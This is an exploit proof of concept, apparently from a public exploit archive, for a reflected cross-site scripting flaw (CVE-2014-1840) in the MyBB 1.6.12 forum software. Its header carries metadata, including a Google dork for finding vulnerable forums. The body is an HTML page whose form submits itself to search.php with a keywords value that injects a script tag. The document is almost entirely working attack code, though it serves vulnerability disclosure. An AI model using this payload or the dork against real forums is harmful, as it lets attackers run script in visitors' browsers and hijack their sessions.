
MyBB 1.6.12 POST XSS 0day

Author: Osanda Malith Jayathissa, Published: 03-02-2014
<html>
<!--
Exploit-Title: MyBB 1.6.12 POST XSS 0day
Google-Dork: inurl:index.php intext:Powered By MyBB
Date: February 2nd of 2014
Bug Discovered and Exploit Author: Osanda Malith Jayathissa
Vendor Homepage: http://www.mybb.com
Software Link: http://resources.mybb.com/downloads/mybb_1612.zip
Version: 1.6.12 (older versions might be vulnerable)
Tested on: Windows 8 64-bit
Video: https://www.youtube.com/watch?v=67MfgixmWgo
Original write-up: http://osandamalith.wordpress.com/2014/02/02/mybb-1-6-12-post-xss-0day
CVE: CVE-2014-1840
-->
<body>
<form name="exploit" action="http://localhost/mybb_1612/Upload/search.php" method="POST">
<input type="hidden" name="action" value="do_search" />
<input type="hidden" name="keywords" value="qor'(&quot;\2a<script>alert(/XSS/)</script>" />
<script>document.exploit.submit(); </script>
</form>
</body>
</html>
